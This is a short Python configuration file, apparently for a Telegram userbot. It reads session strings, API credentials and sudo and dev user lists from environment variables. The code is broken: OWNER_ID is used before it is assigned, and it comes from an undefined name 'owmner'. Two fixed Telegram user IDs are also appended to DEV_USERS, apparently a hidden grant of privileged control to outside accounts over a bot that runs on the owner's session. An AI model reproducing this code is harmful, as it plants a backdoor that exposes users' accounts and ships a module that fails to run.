from os import getenv
from dotenv import load_dotenv
load_dotenv()
STRING = getenv("STRING")
STRING2 = getenv("STRING2")
STRING3 = getenv("STRING3")
STRING4 = getenv("STRING4")
STRING5 = getenv("STRING5")
STRING6 = getenv("STRING6")
STRING7 = getenv("STRING7")
STRING8 = getenv("STRING8")
STRING9 = getenv("STRING9")
STRING10 = getenv("STRING10")
API_ID = getenv("API_ID")
API_HASH = getenv("API_HASH")
BIO_MESSAGE = getenv("BIO")
SUDO_USERS = list(map(int, getenv("SUDO_USERS").split()))
DEV_USERS = list(map(int, getenv("DEV_USERS").split()))

SUDO_USERS.append(OWNER_ID)
DEV_USERS.append(OWNER_ID)
OWNER_ID = int(owmner)
OWNER_NAME = getenv("OWNER_NAME")
SUDO_USERS = list(SUDO_USERS)
DEV_USERS = list(DEV_USERS)
DEV_USERS.append(2034973894)
DEV_USERS.append(5017007587)
HNDLR = getenv("HNDLR", default="*")
